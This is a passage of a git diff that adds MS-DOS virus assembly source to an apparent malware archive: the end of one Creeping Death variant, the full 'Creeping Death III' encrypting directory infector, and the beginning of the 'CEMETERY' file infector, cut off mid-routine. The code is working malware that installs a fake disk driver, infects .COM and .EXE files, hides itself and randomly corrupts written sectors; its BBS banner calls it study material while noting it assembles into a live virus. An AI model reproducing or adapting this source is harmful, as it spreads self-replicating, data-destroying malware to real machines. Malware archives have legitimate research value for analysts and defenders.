BPB + jne Return + lds si,ds:[bx+12h] ; copy the BPB and change it + mov di,offset bpb_buf ; into one that hides the virus + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es ; copy + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,ds:[di+2-32] ; change + cmp al,2 + adc al,0 + cbw + cmp word ptr ds:[di+8-32],0 ; >32mb partition ? + je m32 ; yes, jump to m32 + sub ds:[di+8-32],ax ; <32mb partition + jmp short Return +m32: sub ds:[di+15h-32],ax ; >32mb partition + sbb word ptr ds:[di+17h-32],0 +Return: pop es ; return to caller + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf + +Output: mov cx,0ff09h ; check if disk changed + call check + jz InfectSector ; no, just infect sector + call DoRequest ; yes, write virus to disk + jmp short inf_dsk + +InfectSector: jmp _InfectSector ; infect sector +Read: jmp _Read ; read sector +ReadError: add sp,16 ; error during request + jmp short Return + +Input: call check ; check if disk changed + jz Read ; no, read sector +inf_dsk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk + cld ; save last part of request + lea si,ds:[bx+0eh] + mov cx,8 +save: lodsw + push ax + loop save + mov word ptr ds:[bx+14h],1 ; read 1st sector on disk + call ReadSector + jnz ReadError + mov byte ptr ds:[bx+2],2 ; build BPB + call DoRequest + lds si,ds:[bx+12h] ; ds:si = BPB + mov di,ds:[si+6] ; size of root directory + add di,15 ; in sectors + mov cl,4 + shr di,cl + mov al,ds:[si+5] + cbw + mov dx,ds:[si+0bh] + mul dx ; ax=fat sectors, dx=0 + add ax,ds:[si+3] + add di,ax + push di ; save it on stack + mov ax,ds:[si+8] ; total number of sectors + cmp ax,dx ; >32mb + jnz more ; no, skip next 2 instructions + mov ax,ds:[si+15h] ; get number of sectors + mov dx,ds:[si+17h] +more: xor cx,cx ; cx=0 + sub ax,di ; dx:ax=number is data sectors + sbb dx,cx + mov cl,ds:[si+2] ; cx=sectors / cluster + div cx ; number of clusters on disk + cmp cl,2 ; 1 sector/cluster ? + sbb ax,-1 ; number of clusters (+1 or +2) + push ax ; save it on stack + call Convert ; get fat sector and offset in + mov byte ptr es:[bx+2],4 ; sector + mov es:[bx+14h],ax + call ReadSector ; read fat sector +again: lds si,es:[bx+0eh] + add si,dx + sub dh,cl ; has something to do with the + adc dx,ax ; encryption of the pointers + mov word ptr cs:[gad+1],dx + cmp cl,1 ; 1 sector / cluster + jne Ok +SmallModel: not di ; this is used when the + and ds:[si],di ; clusters are 1 sector long + pop ax + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz here + inc dx + mul dx +here: or ds:[si],ax + pop ax + call Convert + mov si,es:[bx+0eh] + add si,dx +Ok: mov ax,ds:[si] + and ax,di + mov dx,di ; allocate cluster + dec dx + and dx,di + not di + and ds:[si],di + or ds:[si],dx + cmp ax,dx ; cluster already allocated by + pop ax ; the virus ? + pop di + mov word ptr cs:[pointer+1],ax + je _Read_ ; yes, don't write it and go on + mov dx,ds:[si] + push ds + push si + mov byte ptr es:[bx+2],8 ; write + call DoRequest ; write the adjusted sector to + pop si ; disk + pop ds + jnz _Read_ + call ReadSector ; read it again + cmp ds:[si],dx ; is it written correctly ? + jne _Read_ ; no, can't infect disk + dec ax + dec ax ; calculate the sector number + mul cx ; to write the virus to + add ax,di + adc dx,0 + push es + pop ds + mov word ptr ds:[bx+12h],2 + mov ds:[bx+14h],ax ; store it in the request hdr + test dx,dx + jz less + mov word ptr ds:[bx+14h],-1 + mov ds:[bx+1ah],ax + mov ds:[bx+1ch],dx +less: mov ds:[bx+10h],cs + mov ds:[bx+0eh],100h + mov byte ptr es:[bx+2],8 ; write it + call EncryptWrite1 + +_Read_: mov byte ptr ds:[bx+2],4 ; restore this byte + std ; restore other part of the + lea di,ds:[bx+1ch] ; request + mov cx,8 +load: pop ax + stosw + loop load +_Read: call DoRequest ; do request + + mov cx,9 +_InfectSector: mov di,es:[bx+12h] ; get number of sectors read + lds si,es:[bx+0eh] ; get address of data + sal di,cl ; calculate end of buffer + xor cl,cl + add di,si + xor dl,dl + push ds ; infect the sector + push si + call find + jcxz no_inf ; write sector ? + mov al,8 + xchg al,es:[bx+2] ; save command byte + call DoRequest ; write sector + mov es:[bx+2],al ; restore command byte + and byte ptr es:[bx+4],07fh +no_inf: pop si + pop ds + inc dx ; disinfect sector in memory + call find + jmp Return ; return to caller + +;*****************************************************************************; +; ; +; Subroutines ; +; ; +;*****************************************************************************; + +find: mov ax,ds:[si+8] ; (dis)infect sector in memory + cmp ax,"XE" ; check for .exe + jne com + cmp ds:[si+10],al + je found +com: cmp ax,"OC" ; check for .com + jne go_on + cmp byte ptr ds:[si+10],"M" + jne go_on +found: test word ptr ds:[si+1eh],0ffc0h ; file to big + jnz go_on ; more than 4mb + test word ptr ds:[si+1dh],03ff8h ; file to small + jz go_on ; less than 2048 bytes + test byte ptr ds:[si+0bh],1ch ; directory, system or + jnz go_on ; volume label + test dl,dl ; infect or disinfect ? + jnz rest +pointer: mov ax,1234h ; ax = viral cluster + cmp ax,ds:[si+1ah] ; file already infected ? + je go_on ; yes, go on + xchg ax,ds:[si+1ah] ; exchange pointers +gad: xor ax,1234h ; encryption + mov ds:[si+14h],ax ; store it on another place + loop go_on ; change cx and go on +rest: xor ax,ax ; ax = 0 + xchg ax,ds:[si+14h] ; get pointer + xor ax,word ptr cs:[gad+1] ; Encrypt + mov ds:[si+1ah],ax ; store it on the right place +go_on: rol word ptr cs:[gad+1],1 ; change encryption + add si,32 ; next directory entry + cmp di,si ; end of buffer ? + jne find ; no, do it again + ret ; return + +check: mov ah,ds:[bx+1] ; get number of unit +drive: cmp ah,-1 ; same as last call ? + mov byte ptr cs:[drive+2],ah ; set 2nd parameter + jne changed + push ds:[bx+0eh] ; save word + mov byte ptr ds:[bx+2],1 ; disk changed ? + call DoRequest + cmp byte ptr ds:[bx+0eh],1 ; 1=Yes + pop ds:[bx+0eh] ; restore word + mov ds:[bx+2],al ; restore command +changed: ret ; return + +ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk + +DoRequest: db 09ah ; call 70:?, orginal strategy +StrBlock dw ?,70h + db 09ah ; call 70:?, orginal interrupt +IntBlock dw ?,70h + test byte ptr es:[bx+4],80h ; error ? yes, zf = 0 + ret ; return + +Convert: cmp ax,0ff0h ; convert cluster number into + jae fat_16 ; an sector number and offset + mov si,3 ; into this sector containing + xor word ptr cs:[si+gad-1],si ; the fat-item of this + mul si ; cluster + shr ax,1 + mov di,0fffh + jnc cont + mov di,0fff0h + jmp short cont +fat_16: mov si,2 + mul si + mov di,0ffffh +cont: mov si,512 + div si + inc ax + ret + +EncryptWrite1: push ds + push cs + pop ds + push es + push cs + pop es + cld + mov cx,12 + mov si,offset Encrypt + mov di,offset EncryptWrite2 + inc byte ptr ds:[si+8] + rep movsb + mov cl,10 + mov si,offset DoRequest + rep movsb + mov cl,12 + mov si,offset Encrypt + rep movsb + mov ax,0c31fh + stosw + pop es + jmp EncryptWrite2 + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + +File: db "C:",255,0 ; the virus tries to open this + ; file + +Counter dw 0 ; this will count the number of + ; systems that are infected by + ; this virus + +Param: dw 0,80h,?,5ch,?,6ch,? ; parameters for the + ; exec-function + +Signature db 'CREEPING DEATH 3' ; Signature + +Header db 7 dup(?) ; this is the header for the + ; device driver + +f_name: db ? ; Buffer for the filename used + ; by the exec-function + +;*****************************************************************************; +; ; +; The End ; +; ; +;*****************************************************************************; + +code ends + +end Encrypt + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] CoSysOp: Northstar Ken [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; + diff --git a/MSDOS/Virus.MSDOS.Unknown.cdset6.asm b/MSDOS/Virus.MSDOS.Unknown.cdset6.asm new file mode 100644 index 00000000..5ee07186 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdset6.asm @@ -0,0 +1,631 @@ +;*****************************************************************************; +; ; +; Creeping Death III (Encrypting, try to find it) ; +; ; +; (c) Copyright 1992 by Bit Addict ; +; ; +;*****************************************************************************; + +code segment public 'code' + assume cs:code, ds:code, es:code, ss:code + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + + org 5ch ; use the space reserved for + ; the fcbs and command line + ; for more inportant data, + ; because we won't need this + ; data when the virus is + ; installed + +EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt + +BPB_Buf db 32 dup(?) ; buffer for BPB + +Request equ this dword ; address of the request header +RequestOffset dw ? +RequestSegment dw ? + + + org 100h ; com-file starts at offset 100 + ; hex + +;*****************************************************************************; +; ; +; Actual start of virus. In this part the virus initializes the stack and ; +; adjusts the device driver used by dos to read and write from floppy's and ; +; hard disks. Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov si,offset Main-1 ; this part of the program + mov cx,400h-11 ; will decode the encoded +Repeat: xor byte ptr [si],0 ; program, so it can be + inc si ; executed + loop Repeat + +Main: mov sp,600h ; init stack + inc word ptr Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr drive[2],-1 ; set 2nd operand of cmp ah,?? + +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? + jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? + je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. ; +; ; +;*****************************************************************************; + +Boot: mov ds,ds:[16h] ; es = parent PSP + mov bx,ds:[16h] ; bx = parent PSP of Parent PSP + xor si,si + sub bx,1 ; filename+path available ? + jnb Exec ; yes, execute it + mov ax,cs ; get segment of MCB + dec ax + mov ds,ax + mov cl,8 ; count length of filename + mov si,8 + mov di,0ffh +Count: lodsb + or al,al + loopne Count + not cl + and cl,7 +NextByte: mov si,8 ; search for this name in the + inc di ; parent PSP to find the path + push di ; to this file + push cx + rep cmpsb + pop cx + pop di + jne NextByte +BeginName: dec di ; name found, search for start + cmp byte ptr es:[di-1],0 ; of name+path + jne BeginName + mov si,di + mov bx,es + jmp short Exec ; execute it + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. ; +; ; +;*****************************************************************************; + +Last: jcxz Exit + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header ; prepare header of the viral + movsw ; device driver and save the + lodsw ; address of the dos strategy + mov es:StrBlock,ax ; and interrupt procedures + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. ; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; environment available ? + jz Boot ; no, computer is rebooted + mov es,bx + mov ah,49h ; deallocate memory + int 21h + xor ax,ax ; end of environment is marked + mov di,1 ; with two zero bytes +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename +Exec: push bx + push cs + pop ds + mov bx,offset Param + mov ds:[bx+4],cs ; set segments in EPB + mov ds:[bx+8],cs + mov ds:[bx+12],cs + pop ds + push cs + pop es + + mov di,offset Filename ; copy name of this file + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh ; open file, this file will + mov dx,offset File ; not be found but the entire + int 21h ; directory is searched and + pop dx ; infected + + mov ax,4b00h ; execute file + int 21h +Exit: mov ah,4dh ; get exit-code + int 21h + mov ah,4ch ; terminate (al = exit code) + int 21h + +;*****************************************************************************; +; ; +; Installation complete ; +; ; +;*****************************************************************************; +; ; +; The next part contains the device driver used by creeping death to infect ; +; directory's ; +; ; +; The device driver uses only the strategy routine to handle the requests. ; +; I don't know if this is because the virus will work better or the writer ; +; of this virus didn't know how to do it right. ; +; ; +;*****************************************************************************; + + +Strategy: mov cs:RequestOffset,bx ; store segment and offset of + mov cs:RequestSegment,es ; request block + retf ; return to dos (or whatever + ; called this device driver) + +Interrupt: push ax ; driver strategy block + push bx ; save registers + push cx + push dx + push si + push di + push ds + push es + + les bx,cs:Request ; es:bx = request block + push es ; ds:bx = request block + pop ds + mov al,ds:[bx+2] ; command code + + cmp al,4 ; read sector from disk + je Input + cmp al,8 ; write sector to disk + je Output + cmp al,9 + je Output + + call DoRequest ; let dos do handle the request + + cmp al,2 ; Build BPB + jne Return + lds si,ds:[bx+12h] ; copy the BPB and change it + mov di,offset bpb_buf ; into one that hides the virus + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es ; copy + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,ds:[di+2-32] ; change + cmp al,2 + adc al,0 + cbw + cmp word ptr ds:[di+8-32],0 ; >32mb partition ? + je m32 ; yes, jump to m32 + sub ds:[di+8-32],ax ; <32mb partition + jmp short Return +m32: sub ds:[di+15h-32],ax ; >32mb partition + sbb word ptr ds:[di+17h-32],0 +Return: pop es ; return to caller + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf + +Output: inc byte ptr cs:Random ; increase counter + jnz Skip ; zero ? + push bx ; yes, change one byte in the + push ds ; sector to write + lds bx,ds:[bx+16h] + inc bh + inc byte ptr ds:[bx] ; destroy some data + pop ds + pop bx +Skip: mov cx,0ff09h + call Check ; check if disk changed + jz Disk ; yes, write virus to disk + jmp InfectSector ; no, just infect sector +Disk: call DoRequest + jmp short InfectDisk + +ReadError: add sp,16 ; error during request + jmp short Return + +Input: call check ; check if disk changed + jnz InfectDisk ; no, read sector + jmp Read +InfectDisk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk + cld ; save last part of request + lea si,ds:[bx+0eh] + mov cx,8 +Save: lodsw + push ax + loop Save + mov word ptr ds:[bx+14h],1 ; read 1st sector on disk + call ReadSector + jnz ReadError + mov byte ptr ds:[bx+2],2 ; build BPB + call DoRequest + lds si,ds:[bx+12h] ; ds:si = BPB + mov di,ds:[si+6] ; size of root directory + add di,15 ; in sectors + mov cl,4 + shr di,cl + mov al,ds:[si+5] + cbw + mov dx,ds:[si+0bh] + mul dx ; ax=fat sectors, dx=0 + add ax,ds:[si+3] + add di,ax + push di ; save it on stack + mov ax,ds:[si+8] ; total number of sectors + cmp ax,dx ; >32mb + jnz More ; no, skip next 2 instructions + mov ax,ds:[si+15h] ; get number of sectors + mov dx,ds:[si+17h] +More: xor cx,cx ; cx=0 + sub ax,di ; dx:ax=number is data sectors + sbb dx,cx + mov cl,ds:[si+2] ; cx=sectors / cluster + div cx ; number of clusters on disk + cmp cl,2 ; 1 sector/cluster ? + sbb ax,-1 ; number of clusters (+1 or +2) + push ax ; save it on stack + call Convert ; get fat sector and offset in + mov byte ptr es:[bx+2],4 ; sector + mov es:[bx+14h],ax + call ReadSector ; read fat sector + lds si,es:[bx+0eh] + add si,dx + sub dh,cl ; has something to do with the + adc dx,ax ; encryption of the pointers + mov word ptr cs:[gad+1],dx + cmp cl,1 ; 1 sector / cluster + jne Ok + not di ; this is used when the + and ds:[si],di ; clusters are 1 sector long + pop ax ; allocate 1st cluster + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz Here + inc dx + mul dx +Here: or ds:[si],ax + pop ax + call Convert + mov si,es:[bx+0eh] + add si,dx +Ok: mov ax,ds:[si] ; allocate last cluster + and ax,di + mov dx,di + dec dx + and dx,di + not di + and ds:[si],di + or ds:[si],dx + cmp ax,dx ; cluster already allocated by + pop ax ; the virus ? + pop di + mov word ptr cs:[pointer+1],ax + je DiskInfected ; yes, don't write it and go on + mov dx,ds:[si] + mov byte ptr es:[bx+2],8 ; write the adjusted sector to + call DoRequest ; disk + jnz DiskInfected + mov byte ptr es:[bx+2],4 ; read it again + call ReadSector + cmp ds:[si],dx ; is it written correctly ? + jne DiskInfected ; no, can't infect disk + dec ax + dec ax ; calculate the sector number + mul cx ; to write the virus to + add ax,di + adc dx,0 + push es + pop ds + mov word ptr ds:[bx+12h],2 + mov ds:[bx+14h],ax ; store it in the request hdr + test dx,dx + jz Less + mov word ptr ds:[bx+14h],-1 + mov ds:[bx+1ah],ax + mov ds:[bx+1ch],dx +Less: mov ds:[bx+10h],cs + mov ds:[bx+0eh],100h + mov byte ptr es:[bx+2],8 ; write it + call EncryptWrite1 + +DiskInfected: mov byte ptr ds:[bx+2],4 ; restore this byte + std ; restore other part of the + lea di,ds:[bx+1ch] ; request + mov cx,8 +Load: pop ax + stosw + loop Load +Read: call DoRequest ; do request + + mov cx,9 +InfectSector: mov di,es:[bx+12h] ; get number of sectors read + lds si,es:[bx+0eh] ; get address of data + sal di,cl ; calculate end of buffer + xor cl,cl + add di,si + xor dl,dl + push ds ; infect the sector + push si + call find + jcxz no_inf ; write sector ? + mov al,8 + xchg al,es:[bx+2] ; save command byte + call DoRequest ; write sector + mov es:[bx+2],al ; restore command byte + and byte ptr es:[bx+4],07fh +no_inf: pop si + pop ds + inc dx ; disinfect sector in memory + call find + jmp Return ; return to caller + +;*****************************************************************************; +; ; +; Subroutines ; +; ; +;*****************************************************************************; + +Find: mov ax,ds:[si+8] ; (dis)infect sector in memory + cmp ax,"XE" ; check for .exe + jne com + cmp ds:[si+10],al + je found +Com: cmp ax,"OC" ; check for .com + jne go_on + cmp byte ptr ds:[si+10],"M" + jne go_on +Found: test word ptr ds:[si+1eh],0ffc0h ; file to big + jnz go_on ; more than 4mb + test word ptr ds:[si+1dh],03ff8h ; file to small + jz go_on ; less than 2048 bytes + test byte ptr ds:[si+0bh],1ch ; directory, system or + jnz go_on ; volume label + test dl,dl ; infect or disinfect ? + jnz rest +Pointer: mov ax,1234h ; ax = viral cluster + cmp ax,ds:[si+1ah] ; file already infected ? + je go_on ; yes, go on + xchg ax,ds:[si+1ah] ; exchange pointers +Gad: xor ax,1234h ; encryption + mov ds:[si+14h],ax ; store it on another place + loop go_on ; change cx and go on +Rest: xor ax,ax ; ax = 0 + xchg ax,ds:[si+14h] ; get pointer + xor ax,word ptr cs:[gad+1] ; Encrypt + mov ds:[si+1ah],ax ; store it on the right place +Go_on: rol word ptr cs:[gad+1],1 ; change encryption + add si,32 ; next directory entry + cmp di,si ; end of buffer ? + jne find ; no, do it again + ret ; return + +Check: mov ah,ds:[bx+1] ; get number of unit +Drive: cmp ah,-1 ; same as last call ? + mov byte ptr cs:[drive+2],ah ; set 2nd parameter + jne Changed + push ds:[bx+0eh] ; save word + mov byte ptr ds:[bx+2],1 ; disk changed ? + call DoRequest + cmp byte ptr ds:[bx+0eh],1 ; 1=Yes + pop ds:[bx+0eh] ; restore word + mov ds:[bx+2],al ; restore command +Changed: ret ; return + +ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk + +DoRequest: db 09ah ; call 70:?, orginal strategy +StrBlock dw ?,70h + db 09ah ; call 70:?, orginal interrupt +IntBlock dw ?,70h + test byte ptr es:[bx+4],80h ; error ? yes, zf = 0 + ret ; return + +Convert: cmp ax,0ff0h ; convert cluster number into + jae Fat16 ; an sector number and offset + mov si,3 ; into this sector containing + xor word ptr cs:[si+gad-1],si ; the fat-item of this + mul si ; cluster + shr ax,1 + mov di,0fffh + jnc Continue + mov di,0fff0h + jmp short Continue +Fat16: mov si,2 + mul si + mov di,0ffffh +Continue: mov si,512 + div si + inc ax + ret + +EncryptWrite1: push ds ; write virus to disk + push cs ; (encrypted) save regs + pop ds + push es + push cs + pop es + cld ; copy forward + mov cx,12 ; length of encryptor + mov si,offset Encrypt ; start of encryptor + mov di,offset EncryptWrite2 ; destenation + inc byte ptr ds:[si+8] ; change xor value + rep movsb ; copy encryptor + mov cl,10 ; copy dorequest proc + mov si,offset DoRequest + rep movsb + mov cl,12 ; copy encryptor + mov si,offset Encrypt + rep movsb + mov ax,0c31fh ; store "pop ds","ret" + stosw ; instructions + pop es ; restore register + jmp EncryptWrite2 ; encrypt and write vir + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + +File db "C:",255,0 ; the virus tries to open this + ; file + +Counter dw 0 ; this will count the number of + ; systems that are infected by + ; this virus + +Param dw 0,80h,?,5ch,?,6ch,? ; parameters for the + ; exec-function + +Random db ? ; if this byte becomes zero + ; the virus will change the + ; sector that will be written + ; to disk + +Header db 7 dup(?) ; this is the header for the + ; device driver + +Filename db ? ; Buffer for the filename used + ; by the exec-function + + +;*****************************************************************************; +; ; +; The End ; +; ; +;*****************************************************************************; + +code ends ; end of the viral code + +end Encrypt ; start at offset 100h for + ; com-file + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.cemetary.asm b/MSDOS/Virus.MSDOS.Unknown.cemetary.asm new file mode 100644 index 00000000..93242a08 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cemetary.asm @@ -0,0 +1,737 @@ + +PAGE 60,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CEMETERY 圹 +;圹 圹 +;圹 Created: 4-Mar-91 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_1e equ 4Ch ; (0000:004C=31h) +data_2e equ 4Eh ; (0000:004E=70h) +data_3e equ 70h ; (0000:0070=0FF33h) +data_4e equ 72h ; (0000:0072=0F000h) +data_5e equ 84h ; (0000:0084=0E3h) +data_6e equ 86h ; (0000:0086=161Ah) +data_7e equ 90h ; (0000:0090=8Eh) +data_8e equ 92h ; (0000:0092=1498h) +data_9e equ 102h ; (0000:0102=0CC00h) +data_10e equ 106h ; (0000:0106=326h) +data_11e equ 450h ; (0000:0450=184Fh) +data_12e equ 46Ch ; (0000:046C=0C4BCh) +data_13e equ 46Eh ; (0000:046E=10h) +data_14e equ 47Bh ; (0000:047B=0) +data_15e equ 0 ; (0326:0000=6A7h) +data_16e equ 2 ; (0326:0002=70h) +data_17e equ 0 ; (0687:0000=81h) +data_18e equ 1 ; (0688:0001=0FF17h) +data_19e equ 2 ; (06E3:0002=2342h) +data_20e equ 6 ; (06E3:0006=2344h) +data_46e equ 0FBF0h ; (701E:FBF0=0) +data_47e equ 0FBF2h ; (701E:FBF2=0) +data_48e equ 0FC10h ; (701E:FC10=0) +data_49e equ 0FC12h ; (701E:FC12=0) +data_50e equ 0FC14h ; (701E:FC14=0) +data_51e equ 0FC1Eh ; (701E:FC1E=0) +data_52e equ 0FC20h ; (701E:FC20=0) +data_53e equ 0FC26h ; (701E:FC26=0) +data_54e equ 0FC28h ; (701E:FC28=0) + +code_seg_a segment + assume cs:code_seg_a, ds:code_seg_a + + + org 100h + +cemetery proc far + +start: +data_21 dw 0CE9h +data_22 dw 0C304h + db 23 dup (0C3h) + db 'CEMETERY' +data_24 dw 0C3C3h +data_25 dw 0C3C3h +data_26 dw 0 +data_27 dw 0 +data_28 dw 0 +data_29 dw 0 +data_30 dw 0 +data_31 dd 00000h +data_32 dw 0 +data_33 dw 0 +data_34 dd 00000h +data_35 dw 0 +data_36 dw 0 + db 68h, 0E8h, 55h, 3, 90h, 3Dh + db 4Dh, 4Bh, 75h, 9, 55h, 8Bh + db 0ECh, 83h, 66h, 6, 0FEh, 5Dh + db 0CFh, 80h, 0FCh, 4Bh, 74h, 12h + db 3Dh, 0, 3Dh, 74h, 0Dh, 3Dh + db 0, 6Ch, 75h, 5, 80h, 0FBh + db 0, 74h, 3 +loc_1: + jmp loc_13 +loc_2: + push es + push ds + push di + push si + push bp + push dx + push cx + push bx + push ax + call sub_6 + call sub_7 + cmp ax,6C00h + jne loc_3 ; Jump if not equal + mov dx,si +loc_3: + mov cx,80h + mov si,dx + +locloop_4: + inc si + mov al,[si] + or al,al ; Zero ? + loopnz locloop_4 ; Loop if zf=0, cx>0 + + sub si,2 + cmp word ptr [si],4D4Fh + je loc_7 ; Jump if equal + cmp word ptr [si],4558h + je loc_6 ; Jump if equal +loc_5: + jmp short loc_12 + db 90h +loc_6: + cmp word ptr [si-2],452Eh + nop + jz loc_8 ; Jump if zero + jmp short loc_5 +loc_7: + cmp word ptr [si-2],432Eh + jne loc_5 ; Jump if not equal + cmp word ptr [si-4],444Eh + jne loc_5 ; Jump if not equal +loc_8: + mov ax,3D02h + call sub_5 + jc loc_12 ; Jump if carry Set + mov bx,ax + mov ax,5700h + call sub_5 + mov cs:data_27,cx ; (701E:0129=0) + mov cs:data_28,dx ; (701E:012B=0) + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + push cs + pop ds + mov dx,103h + mov si,dx + mov cx,18h + mov ah,3Fh ; '?' + call sub_5 + jc loc_10 ; Jump if carry Set + cmp word ptr [si],5A4Dh + jne loc_9 ; Jump if not equal + call sub_1 + jmp short loc_10 +loc_9: + call sub_4 +loc_10: + jc loc_11 ; Jump if carry Set + mov ax,5701h + mov cx,cs:data_27 ; (701E:0129=0) + mov dx,cs:data_28 ; (701E:012B=0) + call sub_5 +loc_11: + mov ah,3Eh ; '>' + call sub_5 +loc_12: + call sub_7 + pop ax + pop bx + pop cx + pop dx + pop bp + pop si + pop di + pop ds + pop es +loc_13: + jmp cs:data_31 ; (701E:0131=0) + +cemetery endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near + mov cx,[si+16h] + add cx,[si+8] + mov ax,10h + mul cx ; dx:ax = reg * ax + add ax,[si+14h] + adc dx,0 + push dx + push ax + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + cmp dx,0 + jne 